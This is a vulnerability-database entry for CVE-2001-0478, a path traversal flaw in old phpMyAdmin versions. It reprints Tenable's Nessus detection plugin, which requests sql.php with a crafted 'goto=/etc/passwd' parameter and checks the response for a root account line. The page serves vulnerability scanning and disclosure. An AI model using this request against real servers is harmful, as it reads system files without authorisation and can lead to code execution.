Vulnerabilities > CVE-2001-0478 - Unspecified vulnerability in PHPmyadmin

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
phpmyadmin
nessus

Summary

Directory traversal vulnerability in phpMyAdmin 2.2.0 and earlier versions allows remote attackers to execute arbitrary code via a .. (dot dot) in an argument to the sql.php script.

Nessus

NASL familyCGI abuses
NASL idPHPMYADMIN_FILE_READING.NASL
descriptionIt is possible to make the remote phpMyAdmin installation read arbitrary data on the remote host. An attacker may use this flaw to read arbitrary files that your web server has the right to access or execute arbitrary PHP code.
last seen2020-06-01
modified2020-06-02
plugin id11116
published2002-09-04
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11116
titlephpMyAdmin sql.php Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

#
# Ref: http://www.securereality.com.au/archives/sradv00008.txt
#


include("compat.inc");

if (description)
{
 script_id(11116);
 script_version ("1.27");
 script_cvs_date("Date: 2018/07/24 18:56:10");

 script_cve_id("CVE-2001-0478");
 script_bugtraq_id(2642);

 script_name(english:"phpMyAdmin sql.php Traversal Arbitrary File Access");
 script_summary(english:"Checks for the presence of sql.php");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
local file inclusion flaw." );
 script_set_attribute(attribute:"description", value:
"It is possible to make the remote phpMyAdmin installation read
arbitrary data on the remote host.  An attacker may use this flaw to
read arbitrary files that your web server has the right to access or
execute arbitrary PHP code." );
 # https://web.archive.org/web/20020713150446/http://archives.neohapsis.com/archives/bugtraq/2001-04/0396.html
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?769b91eb" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to phpMyAdmin 2.2.1 or newer" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2002/09/04");
 script_set_attribute(attribute:"vuln_publication_date", value: "2001/07/02");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:phpmyadmin:phpmyadmin");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("phpMyAdmin_detect.nasl");
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_ports("Services/www", 80);
 script_require_keys("www/phpMyAdmin", "www/PHP");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, php:TRUE);


function check(dir, file)
{
 local_var r;

 r = http_send_recv3(method:"GET",item:string(dir, "/", file, "?server=000&cfgServers[000][host]=hello&btnDrop=No&goto=/etc/passwd"),
 		port:port, exit_on_fail:TRUE);
 
 if(egrep(pattern:".*root:.*:.*:0:[01]:.*", string:r[2]))
   {
 	security_warning(port);
	exit(0);
   }
}


# Test an install.
install = get_kb_item(string("www/", port, "/phpMyAdmin"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  check(dir:dir, file:"sql.php");
  check(dir:dir, file:"sql.php3");
}